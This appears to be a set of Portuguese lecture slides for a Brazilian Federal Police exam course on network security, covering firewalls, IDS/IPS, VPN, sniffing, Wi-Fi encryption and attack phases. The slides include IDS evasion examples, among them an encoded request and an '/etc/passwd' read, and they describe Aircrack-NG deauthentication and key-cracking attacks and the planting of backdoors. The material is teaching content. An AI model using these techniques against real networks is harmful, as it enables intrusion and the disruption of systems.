Post on 28-Dec-2015
Curso MultiplusPreparatório para prova da
Polícia Federal
Segurança em redes de Computadores
Prof. Marcelo Ribeiromribeirobr (at) globo (dot) com
www.mribeirobr.com
SumárioAbordaremos os seguintes tópicos do Edital
8 - Segurança de redes de computadores
8.1 Firewall, sistemas de deteção de intrusão(IDS), antivírus, NAT, VPN
8.2 Monitoramento e análise de tráfego; Uso de Sniffers; Traffic Shaping
8.3 Tráfego de serviços e programas usados na internet
8.4 Segurança de redes sem fio: EAP, WEP, WPA, WPA2
8.5 Ataques em redes de computadores
Metodologia
Apresentaremos conceitos e alguns exemplos práticos
Tambem serão apresentadas questões de provas anteriores e questões de provas de certificações de Ethical hacking
Segurança em redes - Conceitos
Princípios Básicos
Confidencialidade: Certeza que somente as pessoas autorizadas a acessar os dados podem acessá-los
Integridade: Certeza que os dados não foram alterados - por acidente ou intencionalmente
Disponibilidade: Certeza que os dados estão acessíveis quando e onde forem necessários
Irretratabilidade: Impossibilidade em negar ser origem de uma informação
Segurança - Conceitos Básicos! Elementos Utilizados para Garantir a Confidencialidade
! Criptografia dos dados ! Controle de acesso
! Elementos para garantir a Integridade
! Assinatura digital ! MD5- hash
! Elementos para garantir a Disponibilidade
! Backup ! Tolerância a falhas ! Redundância
! Elementos para garantir a Irretratabilidade ! Assinatura digital
Segurança em redesPerímetro
! Fronteira fortificada da sua rede de dados ! Deve incluir alguns elementos de proteção
Elementos de um Perímetro! Firewall ! VPN ! Zona Desmilitarizada (DMZ) ! Host Hardening ! Intrusion Detection System (IDS) ! Intrusion Prevention System (IPS) ! Network Address Translation (NAT) ! Analisadores de Conteúdo ! Analisadores de Logs ! Security Information and Event Management (SIEM)
Elementos de um perímetro
Dispositivo (hardware + software) que possui regras específicas que permitem ou bloqueiam o tráfico
Barreiras de segurança entre a intranet e a Internet para proteger a rede interna contra acessos não autorizados
Mensagens que entram ou saem da rede devem ser examinadas pelo firewall, que toma ações de acordo com critérios de segurança especificados
Elementos de um perímetro
Tipos:
Estático: Filtro de pacotes
Stateful: memoriza as conexões para uma melhor análise
Proxy de Aplicação
Elementos de um perímetroFirewall tipo filtro de pacotes
Servidor Web
HTTP
Outros Protocolos
Cliente
Elementos de um perímetroFirewall tipo filtro de pacotes
LAN
LAN
LAN
Internet
Firewall
Endereço/Serviço Autorizado
Endereço/Serviço não Autorizado
Elementos de um perímetro
Exemplo de regra de firewall filtro de pacotes
access-list 102 permit tcp 192.168.100.200 0.0.0.0 eq 25
Essa regra, de número 102, permite o IP 192.168.100.200 sair para qualquer endereço (0.0.0.0) na porta 25/TCP (SMTP).
Elementos de um perímetro
Filtro de pacotes - Vantagens
Fácil de implementar
Praticamente qualquer ativo de rede permite a criação de um
Filtro de pacote - Desvantagens
Facilmente burlável através de técnicas de IP Spoofing
Atua apenas na camada 3 do modelo OSI
Elementos de um perímetroO ataque de IP Spoofing consiste em enganar o Firewall, mudando a origem do pacote, para uma origem conhecida pelo Firewall e autorizada por ele.
Normalmente usa-se os ednereços da rede interna (os quais, normalmente, são confiáveis para o Firewall)
O Anti-Spoofing é um conjunto de regras que impede que pacotes com endereço das redes internas venham de interfaces externas.
Elementos de um perímetroProxy de aplicação
O que é? ! Procurador ! Atua no nível da aplicação- orientado a aplicação ! Geralmente, o cliente precisa ser modificado- não é transparente ! Funciona como acelerador - cache
Proxy Cache
Web Server
Elementos de um perímetroProxy de Aplicação
Por que usar? ! Autenticação de usuário ! Inspeção de Conteúdo ! Cache ! Registro de Acessos ! Esconde detalhes da rede interna
Proxy Cache
Web Server
Elementos de um perímetroProxy de aplicação
Proxy Web Server
1
3
6
2
5
4
Verifica …
User autorizado?
Protocolo permitido?
Destino autorizado?
Elementos de um perímetroProxy de aplicação
Internet
LAN2 Matriz
LAN1
1
3 5
6
2 4
Elementos de um perímetroProxy reverso
3
Web Server
DNS Server
Proxy R
5
4
2
6
1
Verifica …
Request é permitido?
Protocolo permitido?
Destino permitido?
Elementos de um perímetroFirewall Statefull Inspection
Tambem conhecido como Filtro de pacotes dinâmico
Consegue atuar nas 7 camadas do modelo OSI pois consegue reconhecer cada protocolo (não apenas abre as portas, mas entende o protocolo em si), podendo interpretar um ataque sobre o protocolo.
Elementos de um perímetroFirewall Statefull inspection
Vantagens
O mais seguro atualmente por conseguir reconhecer ataques semânticos
Desvantagens
Mais complexo de implementar e administrar
Necessita estar sempre atualizado para manter seu nível de segurança.
Elementos de um perímetro
VPN - Virtual Private Network
Esta técnica consiste em encapsular um pacote, não cifrado, em um outro que está cifrado por uma chave de sessão.
O outro parceiro da comunicação será capaz em remover o pacote original do encapsulamento e estabelecer a comunicação com o pacote restaurado.
Elementos de um perímetro
Internet
Usuário remoto
ISDN Cable DSL Site central
Server
Site Remoto
Site Remoto
Elementos de um perímetroClassificação de VPN
Por tipo
Remote access
Site-to-Site
Por tecnologia
IPSEC
SSL
Elementos de um perímetro
DMZ - Demilitarized Zone
Rede separada, na qual são hospedados servidores ou serviços a serem disponibilizados externamente.
Objetiva separar os serviços externos da rede interna da empresa ou mesmo separar serviços mais críticos/vulneráveis de redes mais sensíveis.
Elementos de um perímetro
Internet
Servidor Web
Firewall
Cliente
Intranet
Elementos de um perímetro
Router B
Parceiro1 Parceiro2 Parceiro3
Internet
INTRANET
LAN1
LAN2
LAN3
LAN4
LAN5
FILIAL
VPN
DMZ
WEB Server
DNS Server
Mail Server
Proxy R.
Hardened Server
Firewall Firewall/ Proxy
Elementos de um perímetroSistemas de deteção de intrusão (IDS - Intrusion Detection System)
Utilizado para detectar e alertar eventos maliciosos
Antecipar possíveis invasões aos sistemas
O sistema de defesa deverá dispor de vários agentes IDS pela rede
Normalmente verifica assinaturas pré-definidas e eventos maliciosos
Podem ser de rede (NIDS) ou de host (HIDS)
Elementos de um perímetro
Elementos de um Perímetro
HIDS
Esse tipo de IDS reside em um único “host” e monitora atividades específicas do mesmo
Pode ser baseado em assinaturas
Verifica a integridade dos arquivos do SO
Monitora utilização de recursos do host
Elementos de um perímetroHIDS - O que ele monitora?
! Exemplos de componentes monitorados
! Memória ! Arquivos executáveis ! Espaço em disco
! Kernel
Elementos de um perímetroNIDS
Monitora todo o tráfego da rede e compara este a um banco de dados com assinaturas de ataque
Quando uma assinatura é detectada um evento é disparado pelo IDS
Sistema utilizado para detectar e/ou reagir a uma assinatura de ataque na rede
Utilizado para analisar o tráfego de rede em tempo real
Equipamento dedicado com processamento compatível com o tamanho da infra-estrutura
Elementos de um perímetroNIDS
! Sensor de Rede ! Posicionamento em função do conhecimento da topologia
! Em ambientes com switch - Espelhamento de porta ! Configuração stealth recomendada - Interface de captura sem endereçamento e capturando tráfego de rede em modo promíscuo
Elementos de um perímetroSistema de prevenção de intrusão - IPS (Intrusion Prevention System)
Funciona de forma análoga ao IDS, mas além de alertar sobre os ataques ele é capaz em bloquear os mesmos, através de interações com outros dispositivos na rede (Firewalls, roteadores, switches, dentre outros)
Pode ser usado em modo “Learning”, no qual atuará como um IDS
Elementos de um perímetroPrincipais problemas dos IPS/IDS
Dependem fortemente das assinaturas de ataques estarem atualizadas (semelhante aos anti-vírus)
Se houver um ataque dentro de uma VPN ou contra um servidor WEB com SSL habilitado ele será incapaz em detectar o ataque, face a criptografia *
Complexos de implementar
* A menos que seja um IPS recente, no qual é possível instalar as chaves de sessão de criptografia no mesmo, possibilitando a leitura do trafego anteriormente cifrado e sua análise.
Elemento de um perímetroTerminologia comum com IDS/IPS
Falso Positivo - A detecão de uma atividade normal, mas interpretada como uma atividade maliciosa. Ocorre normalmente pela configuração não ajustada do dispositivo de detecção. Pode ser atribuida a uma configuração “segura” demais ou ao comportamento pouco convencional de alguns protocolos
Falso Negativo - A interpretação de um evento malicioso como sendo uma atividade normal, não gerando nenhum tipo de aviso ao administrador do sistema. Normalmente ocorre com um dispositivo configurado para ser permissivo (por falha de configuração ou para permitir determinada aplicação funcionar)
Elementos de um perímetroFuncionamento de um IDS
Tecnologia complementar ao firewall
Realiza inspeção profunda em pacotes de rede (DPI)
Tecnologia Reativa – detection (ataque pode ser simples pacote)
Elementos de um perímetroO que IDS procuram?
Tentativa de Intrusão
Denial of Service
Atividade Suspeita
Anomalia em Protocolos
Anomalia Estatistica
Elementos de um perímetroModelos
Baseado em assinaturas
Baseado em detecção de anomalias
Estratégias de monitoramento
Tipos
Network Based
Host Based
Elementos de um perímetroIDS baseado em assinaturas - funcionamento
Análise por Pacote - procura assinaturas de ataque individualmente, em cada pacote. Não detecta ACK scans lentos. Não consegue verificar a relação entre pacotes associados. Ex. Shadow, RealSecure.
Statefull - Adiciona a capacidade de procurar por assinaturas na sessão. Entende fragmentação de pacotes e Identifica ataques em múltiplos pacotes, pois verifica o estado das comunicações e a remontagem dos pacotes. Ex. Loki (icmp e UDP53) – “Covert comunication Channel”. Ex. Network Flight Recorder, DragonIDS. Snort e CSIDS (estáticos com caract. Statefull).
Protocol Decode-Based - verificação é feita no nível da aplicação. Ex. HTTP e SMTP. Utilizados para prevencão de ataques a aplicações específicas.
Heuristic Analysis-Based - processo de analisar o tráfego de forma estatística.
Caracteriza o tráfego.
Quantas portas estão sendo abertas por um único host, por minuto? Quantos sistemas estão conectados a um único host? Quantas conexões por segundo estão sendo utlizadas?
Método utilizado para detectar port scan.
Elementos de um perímetroIDS baseados em assinaturas: Vantagens e desvantagens
Vantagens
Baixa rate de alarmes falsos, comparado com outros tipos de IDS.
Regras padronizadas e de fácil entendimento. As regras do IDS snort são simples e de fácil entendimento. Podem ser editadas e até mesmo criadas a partir do conhecimento do modus operandi de um exploit.
Desvantagens
Uso intenso de recursos pois pode verificar os pacotes nas camadas mais altas. O custo da abertura integral dos pacotes da rede pode ser bastante intenso, em termos de processamento e uso de memória.
A base de dados de assinaturas de ataques necessita de manutenção e updates contínuos, tendo em vista que novos ataques surgem a cada dia. Caso as atualizações não sejam efetuadas o sensor não irá alertar para um novo ataque. Esses ataques não serão detectados até que suas assinaturas sejam atualizadas ou criadas manualmente no IDS.
Elementos de um perímetroIDS baseado em anomalia
Aprende a rede
Fronteira entre normal e anormal é tenue
Elementos de um perímetroIDS baseado em anomalia
Vantagens
Dinamicamente adaptável a novos ataques, pois aprende a conhecer o comportamento da rede e alerta para qualquer nova atividade.
Simples de se implementar. Não há muito o que configurar, bastando colocá-lo para aprender e depois torná-lo funcional.
Desvantagens
Alta rate de alarmes falsos. Nem tudo é aprendido pelo IDS. Novas situações ocorrem a cada momento.
Atividade dos usuários e comportamento do sistema pode não ser estático o suficiente para ser implementado de forma efetiva. Configurações em uma rede local mudam o tempo todo.
Elementos de um perímetroEstratégias de monitoramento
Host - Fonte de dados: interna ao sistema. Geralmente logs do sistema (Ex.Windows event logs e Linux Syslog.
Restrito a eventos do sistema operacional. Pode monitorar system calls, memória, processos etc. Ex. Cisco Security Agent.
Monitoramento de Rede - Fonte de dados: pacotes de rede. Dispositivos de rede em modo promíscuo. Esse tipo pode ser afetado pela arquitetura da rede. Ex. redes com switches necessitam de algumas adaptações. Além disso, não é restrito a tráfego destinado a um único host Ex. Cisco IDS, Snort, Shadow.
Monitoramento de Aplicacao - Fonte de dados: aplicação em uso: logs de eventos da aplicação. Possiveis aplicações: Web servers - IIS, Apache etc. Mail servers – Sendmail, Exchange etc. Ex. Cisco Security Agent e ISS RealSecure – analisa logs, verifica assinaturas e entende aplicações Web –IIS e Apache.
Monitoramento de alvo - focado em um sistema. Monitora o estado de um objeto e utiliza criptografia – funções de hash. Detecta alterações no sistema, mas não envia alertas em tempo real. Ex. Alterações nos arquivos cmd.exe, /sbin/ps, ls etc. Ex. Tripwire e Advance Intrusion Detection Engine (AIDE).
Elementos de um perímetroIDS/IPS - Técnicas de evasão
Method Matching
URL Encoding
Duble Slashes
Self-Reference Directories
Flooding de alertas
Fragmentação
Elementos de um perímetroMethod Matching
Substituição
GET /cgi-bin/example.cgi HTTP/1.0
por
HEAD /cgi-bin/example.cgi HTTP/1.0
URL Encoding
http permite URL utilizando notação %xx, onde xx é o valor hex do caracter
cgi-bin = %63%67%69%2d%62%69%6e
get /%63%67%69%2d%62%69%6e/exemple.cgi HTTP/1.0
Double Slashes
Substitui / por //
Self-Reference Directories
Adiciona /./ na URL para confundir o sensor
Elementos de um perímetroTécnicas de evasão (cont.)
Flooding de alertas
Atacante utiliza ferramentas para confundir o sensor inundando o mesmo com pacotes que simulam assinaturas de ataque.
Sensor perde pacotes (flooding) ou o ADM fica confuso com tantos alertas (o ataque não é visualizado).
Ferramentas:
Stick e Snot - “IDS Killers”, baseados nas assinaturas do snort.
Nmap –D “decoy”.
Elementos de um perímetroTécnicas de evasão (cont.)
Fragmentação
Utilizada em todas as fases do ataque
Remontagem no destino confunde o sensor
Tipos de fragmentação
get …./etc/passwd
Elementos de um perímetroFragmentação (cont.)
Diferentes S.O remontam fragmentos de forma diferente. Não existe padronização para a remontagem.
O sensor, não necessariamente sabe o método de remontagem que será utilizado (fica confuso).
Snort com frag2 sempre remonta como Linux.
Snort com frag3 tem múltiplos buffers de remontagem.
CSIDS tem setagem para escolher manualmente – só pode remontar de uma forma e com isso só identifica ataques fragmentados em um único Sistema Operacional.
Ferramentas de attaque para fragmentação
Nmap – tiny fragment attack.
Fragrouter.
FragRoute.
Elementos de um perímetroNAT - Network Address Translation
Técnica utilizada por um dispositivo para a tradução de endereços IP
Permite que uma rede use um conjunto de endereços IP particulares para tráfego interno
Converte os endereços IP particulares em endereços IP públicos
Aumenta a segurança ocultando endereços IP Internos
Permite que uma organização economize endereços IP públicos
Pode ser classificado em:
Estático (ou 1 para 1) - Onde um endereço público é traduzido para um interno
Dinâmico (ou 1 para muitos) - Onde um endereço público pode ser traduzido para vários internos. O controle disso se dá através de uma tabela, no dispositivo que controla o NAT, associando cada conexão a um Source Port)
Elementos de um perímetro
131.107.0.9 131.107.0.9
10.10.10.7 Tabela NAT ! 10.10.10.0 mapeia
para 131.107.0.9
10.10.10.6
10.10.10.10
Elementos de um perímetroAnti-vírus
Software, comumente instalado nos hosts da rede, que tem como função buscar uma ameaça (malware) em um arquivo no computador.
Esta análise se dá através de comparação com um banco de assinaturas de malwares disponibilizada pelo fabricante
Pode usar uma análise herústica, que possibilita a detecção de malwares não conhecidos pelo fabricante, assim como também pode gerar grande número de falsos positivos.
Elementos de um perímetro
Anti-vírus (cont.)
O que acontece se criarmos um arquivo texto em um computador com anti-vírus e digitamos as linhas abaixo?
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Monitoramento e análise de tráfego
A tarefa de análise de tráfego de rede é executada, comumente, com o uso de uma ferramenta chamada Sniffer.
Esta ferramenta funciona lendo o tráfego de rede que chega até a interface de rede do computador utilizado para a análise
Em face do Sniffer apenas poder análisar o tráfego que passa pela sua interface de rede faz-se necessário que TODO o tráfego da rede chege a interface. Conseguimos isso colocando a interface de rede no chamado “modo promíscuo”
Monitoramento e análise de tráfego
Modo promíscuo
Faz com que a placa da rede responda a todos os pacotes que circulam pela rede, independente se estes foram destinados aquela interface ou não
Consegue-se esse efeito respondendo a todos os pacotes de broadcast que circulam na rede, dando a impressão que todos os pacotes são para aquele host.
Monitoramento e análise de tráfego
Sniffer
Contudo os pacotes ainda precisam ser acessíveis pela porta
Em uma rede com “Hubs” isso faz parte do modo de funcionamento normal da rede, pois TODAS AS PORTAS RECEBEM TODOS OS PACOTES (também chamado de “Passive Sniffing”)
Em uma rede com switches isso não acontece, pois O SWITCH REDIRECIONA O PACOTE PARA A PORTA CORRETA, EM CONFORMIDADE COM O SRC ADDRESS DO PACOTE
Como usar Sniffers em redes com switches?
Monitoramento e análise de tráfego
Sniffer (cont.)
Switch Monitor port (Ou SPAN port)
Porta especial, configurável em um switch gerenciável, que recebe uma cópia de cada pacote que circula naquele switch, independente de ser a porta correta para aquele pacote
Serve apenas para monitoramento de rede.
Também chamado de “Active Sniffing”
Em equipamentos da Cisco a porta de monitoramento chama-se SPAN (Switched Port Analyser)
Vale salientar que esta dificuldade sobre a porta vale também para dispositivos como IDS e IPS pois, em essência, funcionam de forma análoga a um Sniffer.
Monitoramento e análise de tráfego
Protocolos interessantes para se monitorar com um sniffer
Telnet e RLOGIN - Transmitem usuário e senha em claro na rede
HTTP - Todo o tráfego segue em claro
SMTP, NNTP, POP, FTP, IMAP - Senhas e dados seguem em claro
Monitoramento e análise de tráfego
Ferramenta: Wireshark
Popular sniffer, open source, sendo praticamente ferramenta padrão deste tipo.
Monitoramento e análise de tráfego
Monitoramento e análise de tráfego
O que um sniffer não pode ver em uma rede?
Tráfego criptografado
Tráfego que não passe pela sua interface (a menos que seja feito um ataque para desviar a rota)
Monitoramento e análise de tráfego
TCP Dump
Ferramenta para debugging de rede, na qual diversas outras são baseadas (o IDS Snort, por exemplo)
Usa a biblioteca Libpcap, também usada pelo Wireshark
Não é tão amigável quanto o Wireshark, mas é mais prático em algumas situações
Monitoramento e análise de tráfego
TCP Dump
Monitoramento e análise de tráfego
Exemplos práticos com o Wireshark
Monitoramento e análise de tráfego
Traffic Shapping
Técnica que prioriza tráfego, de acordo com algumas políticas e regras, para otimizar o uso de largura de banda disponível no link
Muito utilizado como técnica de QoS (quality of service)
Pode priorizar usando as seguintes políticas
Por tipo de serviço
Por rede
Por peso de protocolo e conexão (WRR - Weighted round robin)
Muito utilizado em provedores de internet para controle de protocolos que reconhecidamente cogestionam uma rede (P2P por exemplo)
Segurança em redes sem fio
Redes sem fio (Wireless) estão cada vez mais presentes em nosso dia a dia, mas face a simplicidade em se colocar uma delas em funcionamento comumente estão inseguras.
É muito comum encontrar redes sem fio, sem senha, até mesmo no centro do RJ
Segurança em redes sem fio
Segurança em redes sem fio
Segurança em redes sem fioPadrões
Banda de até 54 Mbps e atua na faixa de frequencia de 5 Ghz!
Banda de até 11 Mbps e atua na faixa de frequencia de 2,4 Ghz!
Banda de até 54 Mbps e atua na faixa de frequencia de 2,4 Ghz!
Um padrão para WLAN que prove melhor criptografia para redes 802.11a,b e g!
Novo padrão 802.11 que suporta banda de 100Mbps +!
Grupo de padrões para Wireless MAN (Metropolitan Area Networks)!
Suporta transferencias a baixa velocidade (1-3 mbps) e baixo alcance (˜10 metros), desenvolvido para dispositivos móveis!
Segurança em redes sem fioService Set Identifier (SSID)
É um token para idenficar uma rede 802.11.
É parte do cabeçalho dos pacotes 802.11
Funciona como um identificador único compartilhado entre o AP e os clientes
Se alterado no AP precisa ser mudado em TODOS os clientes
Clientes podem se conectar a um SSID “none” ou “any”, que é uma configuração não segura.
Segurança em redes sem fioModo de autenticação Open Authentication Process
Segurança em redes sem fioModo de autenticação com Shared Key
Segurança em redes sem fio
Importante lembrar que uma rede sem fio funciona como um HUB.
Todos os AP de uma rede recebem todos os pacotes da rede
Mesmo os AP que não fazem parte da rede ainda podem receber os pacotes, pois os mesmo trafégam “over the air”, sem controle
Caso a rede possua uma senha estes pacotes estarão criptografados. Dependendo do algorítmo de criptografia as informações poderão ser acessadas em 10 minutos ou alguns anos...
Segurança em redes sem fio
EAP - Extensible Authentication Protocol
Padrão IEEE (RFC 5247)
Permite multiplos meios de autenticação, como certificados, tokens, kerberos ...
LEAP - Lightweight EAP - Versão proprietária da Cisco deste protocolo
Segurança em redes sem fioWEP (Wired Equivalency Protocol)
Padrão original de criptografia para redes sem fio
Facilmente quebrável (não segura)
Utiliza vetores de inicialização (IV) de 24-bits, que compõem uma cifra RC-4 para confidecialidade das comunicações.
Cada IV no WEP possui 24 bits, facilitando o processo de “quebra”
Segurança em redes sem fioWEP (cont.)
Usa CRC32 para integridade, que é insuficiente para garantir a integridade criptográfica do pacote.
Como cada IV tem 24 bits seria possível prever todos os IV em um AP, transmitindo pacotes de 1500 bytes a 11 Mb/s em 5 horas
Com um grande número de IV coletados é possível descobrir a chave secreta da rede
Por ser baseado em senhas pode ser alvo de ataques de dicionário
Mensagens de associação e disassociação de um host na rede não são autenticados, permitindo que derrubemos alguém da rede mesmo sem estar na rede
Segurança em redes sem fioWPA (Wi-fi protected Access)
Evolução do WEP, que resolve alguns dos problemas mais críticos deste.
IV’s de 48 bits ao invés de 24 bits
Uso mais raro de chaves compartilhadas e implementação de chaves temporárias para cifragem de pacotes (protoco TKIP - Temporal Key Integrity Protocol)
É possível injetar pacotes na rede para causar um Denial Of Service (DoS)
Suceptível a ataques de dicionário
Segurança em redes sem fio
Wi-fi Protected Access 2 (WPA2)
Atualmente o mais seguro dos mecanismos de criptografia e autenticação para redes sem fio
Basicamente é suceptível apenas a ataques de dicionário, que podem ser demorar muito tempo para completar
Segurança em redes sem fio
Segurança em redes sem fioAtaques ao controle de acesso
War Driving
Rogue Access Points
Mac Spoofing
Associações AD Hoc
AP mal configurados
Clients mal configurados
Associação não-autorizada
Promiscuous client
Segurança em redes sem fio
Ataques à integridade
Injeção de quadro de dados
WEP Injection
Data Replay
Initialization Vector Replay Attacks
Segurança em redes sem fioAtaques à confidencialidade
Honeypot Access Point
Traffic Analysis
Evil Twin AP
Man-in-the-middle (MITM)
Quebra de chave WEP
Segurança em redes sem fioAtaques à disponibilidade
Roubo de AP
DoS
Beacon Flood
Autenticate Flood
Disassociation Flood
De-Authenticate Flood
Segurança em redes sem fioRogue access point attack
Segurança em redes sem fioClient Mis-association
Segurança em redes sem fioUnauthorized Association
Segurança em redes sem fioHoneyspot Access Point Attack
Segurança em redes sem fio
Segurança em redes sem fioDenial of Service attack
Segurança em redes sem fioEntendendo um pacote 802.11
Segurança em redes sem fioPacote 802.11
Protocol Version - Indica a versão do do protocolo 802.11 usado. Valor atualmente é 0
Type e SubType - Determina a função do frame, podendo ser :
Control - Valor 1
Dados - Valor 2
Gerenciamento - Valor 0
To DS e From DS - Indica se o frame está vindo ou indo para o DS (Distribution System ou, na terminologia de rede sem fio, rede cabeada (Ethernet))
More fragments - Indica se há mais fragmentos nos frams que seguirão este
Retry - Indica se o frame está sendo retransmitido
Segurança em redes sem fioPacote 802.11 (cont.)
Power Management - Indica se o STA está em modo ativo (valor 0) ou em power-save (valor 1)
More Data - Indica para o STA, em power save mode, que o AP tem mais quadros para enviar.
WEP - Indica se há, ou não, criptografia no quadro analisado
Order - Indica ser o pacote está sendo enviado usando uma classe de serviço estritamente ordenada. Não utilizada atualmente.
Segurança em redes sem fio
Pacote 802.11 (cont.)
Sequence Control
Sequence number (12 bits) - Indica a o número de sequencia de cada quadro. Varia de 0-4095
Fragment Number (4 bits) - Indica o número de cada fragmento de um quadro enviado.
Segurança em redes sem fioPacote 802.11 (Cont.)
Data
Pode ter até 2324 bytes de dados.
O MSDU (Mac Service Data Unit) no padrão IEEE 802.11 é 2304 Bytes.
Há algum overhead quando usa-se criptografia:
WEP: 8 bytes -> 2312 Bytes total
TKIP (WPA1): 20 Bytes -> 2324 Bytes total
CCMP(WPA2): 16 Bytes -> 2320 Bytes total
Segurança em redes sem fioAtacando uma rede sem fio
Primeiramente é necessário ter uma placa de rede com um driver que permita a placa entrar no chamado “modo promíscuo”, semelhante ao que acontece com o uso de sniffers em redes cabeadas
Contudo nem todas as placas possuem um driver com esta função, pois não é comum o fabricante da placa de rede “bloquear” esta função em seus drivers originais
Contudo é possível encontrar uma uma relação de placas com drivers que suportam o modo promíscuo no link http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#which_is_the_best_card_to_buy
Segurança em redes sem fio
Para fazer os ataques existe um framework conhecido chamado Aircrack-NG
Este software está instalado, por padrão, na distribuição Linux para testes de invasão “Backtrack” e “Kali Linux”
Existem versões para Windows, mas é mais comumente usada em Linux
Segurança em redes sem fio
Ferramentas do Aircrack-NG
Airmon-ng
Utilizado para habilitar o modo monitor(promíscuo) nas interfaces de rede sem fio
Sintaxe: airmon-ng <start|stop> interface [channel]
Segurança em redes sem fioFerramentas do Aircrack-NG (cont.)
Airdump-NG
Ferramenta utilizada para capturar dados brutos 802.11 e, particularmente, coletar IV’s WEP para uso posterior com o Aircrack-NG
Se houver um receptor de GPS plugado e compatível o Airdump-NG poderá mostrar as coordenadas geográficas dos AP ou clientes encontrados
Segurança em redes sem fio
Ferramentas Aircrack-NG (cont.)
Exemplo de saída do Airdump-NG CH 9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 00:14:6C:7E:40:80
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID00:09:5B:1C:AA:1D 11 16 10 0 0 11 54. OPN NETGEAR00:14:6C:7A:41:81 34 100 57 14 1 9 11 WEP WEP bigbear00:14:6C:7E:40:80 32 100 752 73 2 9 54 WPA TKIP PSK teddy
BSSID STATION PWR Lost Packets Probes00:14:6C:7A:41:81 00:0F:B5:32:31:31 51 2 14(not associated) 00:14:A4:3F:8D:13 19 0 4 mossy00:14:6C:7A:41:81 00:0C:41:52:D1:D1 -1 0 500:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 99 teddy
Segurança em redes sem fioFerramentas do Aircrack-NG (cont.)
Airdump-NG
Informações importantes
BSSID - Endereço MAC do AP
PWR - Nível de sinal reportado pela placa de rede. Quanto mais alto, mais próximo do AP ou da estação. Se o BSSID PWR é -1 então o driver não suporta report de nível de sinal. Se PWR é -1 para um número restrito de estações então este pacote veio do AP mas está indo para uma estação que está fora do alcance de nossa placa de rede. Se todos os clientes tiverem PWR -1 então o driver não suporta report de nível de sinal.
Segurança em redes sem fioFerramentas do Aircrack-NG (cont.)
Airdump-NG
Informações importantes
RXQ - Qualidade de recepção, que é medido pela porcentagem de pacotes (de gerenciamento e dados) que foram recebidos com sucesso nos últimos 10 segundos
BEACONS - Número de pacotes de anúncios enviados pelo AP. Cada AP envia em torno de 10 beacons por segundo.
#Data - Número de pacotes de dados capturados (se WEP, aponta o número de IV não repetidos), incluindo pacotes de broadcast
#/s - Número de pacotes de dados por segundo, medidos nos últimos 10 segundos.
CH - Número do canal (obtido dos pacotes de anúncio)
Segurança em redes sem fioFerramentas do Aircrack-NG (cont.)
Airdump-NG
Informações importantes
MB - Velocidade máxima suportada pelo AP. Se MB=11 então 802.11b, se MB = 22 então 802.11b +. E taxas mais altas de 802.11g
ENC - Algoritimo de criptografia em uso. OPN= Sem criptografia. WEP?= WEP ou superior (indefinido), WEP=WEP, WPA=WPA, WPA2=WPA2
CIPHER - Cifra detectada (CCMP, WRAP, TKIP, WEP, WEP40 ou WEP104)
AUTH - Tipo de autenticação (MGT=servidor de autenticação externo, SKA=Chave compartilhada para WEP, PSK=Chave compartilhada para WPA/WPA2 ou OPN=Aberta para WEP)
Segurança em redes sem fioFerramentas do Aircrack-NG (cont.)
Airdump-NG
Informações importantes
ESSID - Mostra o SSID. Se vazio o Airdump-NG tentará obter esta informação dos pacotes capturados
STATION - Endereço MAC das estações detectadas
LOST -Número dos pacotes perdidos nos últimos 10 segundos, baseado no número de sequencia.
PACKETS - Número de pacotes de dados enviados pelo cliente
PROBES - O SSID procurado pelo cliente
Segurança em redes sem fio
Ferramentas do Aircrack-NG
Aireplay-NG
Usado para gerar ou acelerar o tráfego para uso posterior com o Aircrack-NG
Suporta diversos tipos de ataques
Segurança em redes sem fioFerramentas do Aircrack-NG
Aireplay-NG - Ataques suportados
Ataque 0 - Deauthentication
Ataque 1 - Fake authentication
Ataque 2 - Interactive packet replay
Ataque 3 - ARP request replay attack
Ataque 4 - KoreK chopchop attack
Ataque 5 - Fragmentation attack
Ataque 9 - Injection test
Segurança em redes sem fioFerramentas do Aircrack-NG
Aireplay-NG - Ataques
De-athentication attack
Ataque número “0” do Aireplay
Força um cliente específico (ou todos, se não informarmos o MAC de um cliente) a se desconectar de uma rede sem fio e fazer nova autenticação.
Segurança em redes sem fioFerramentas do Aircrack-NG
Aireplay-NG - Ataques
Fake Authentication
Permite que vc faça dois tipos de autenticação WEP (Open system e chave compartilhada) e faça uma associação a um AP.
Este ataque é útil quando não há clientes associados a rede.
Segurança em redes sem fioFerramentas do Aircrack-NG
Aireplay-NG - Ataques
Interactive Packet Replay
Permite que um pacote seja re-inserido na rede (replayed), podendo gerar efeitos vantajosos ao atacante (como o aumento de vetores de inicialização)
Segurança em redes sem fioFerramentas do Aircrack-NG
Aireplay-NG - Ataques
ARP Request Replay
Semelhante ao Packet Replay, mas focado em ARP request.
Também possui foco em aumentar a geração de initialization vectors
Segurança em redes sem fioFerramentas do Aircrack-NG
Aireplay-NG - Ataques
Korek ChoChop Attack
Permite decifrar dados de uma rede WEP sem conhecer a chave
Não dá acesso a chave em si
Alguns AP não são vulneráveis ao ataque
Segurança em redes sem fioFerramentas do Aircrack-NG
Aireplay-NG - Ataques
Fragmentation Attack
Utilizado para obter o PRGA (Pseudo Random Generation Algorithm) dos pacotes
PRGA pode ser usado pelo packetforge-NG para gerar pacotes forjados dentro de uma rede sem fio
Segurança em redes sem fio
Ferramentas do Aircrack-NG
Aircrack-NG
Ferramenta para quebra de chaves WEP e WPA/PSK
Ataques em redes de computadores
Metodologia de ataque
Todo ataque é dividido em fases e estas não possuem um prazo exato para terminar. Podem durar alguns meses até anos, dependendo do alvo.
As fases são Reconhecimento, Obtendo acesso, mantendo acesso e limpando os traços.
Ataques em redes de computadores
Obtendo acesso
Nesta fase são exploradas as vulnerabilidades e fraquezas encontradas na fase anterior, visando obter acesso ao alvo
Uso de exploits contra servidores vulneráveis, uso de informações encontradas no google para invadir um servidor Web, engenharia social contra alvos pré-selecionados, dentre outras atividades.
Ataques em redes de computadores
Mantendo acesso
Após obter acesso desejamos manter este acesso, em caso do administrador descobrir a vulnerabilidade e remover esta.
Nesta fase são instalados backdoors, rootkits e qualquer código que permita um acesso posterior.
Ataques em redes de computadores
Limpando os traços
Nesta fase elimina-se, dentro do possível, os traços da presença do hacker no sistema invadido.
Logs comumente são apagados, códigos inseridos são ocultados, dentre outras tarefas.
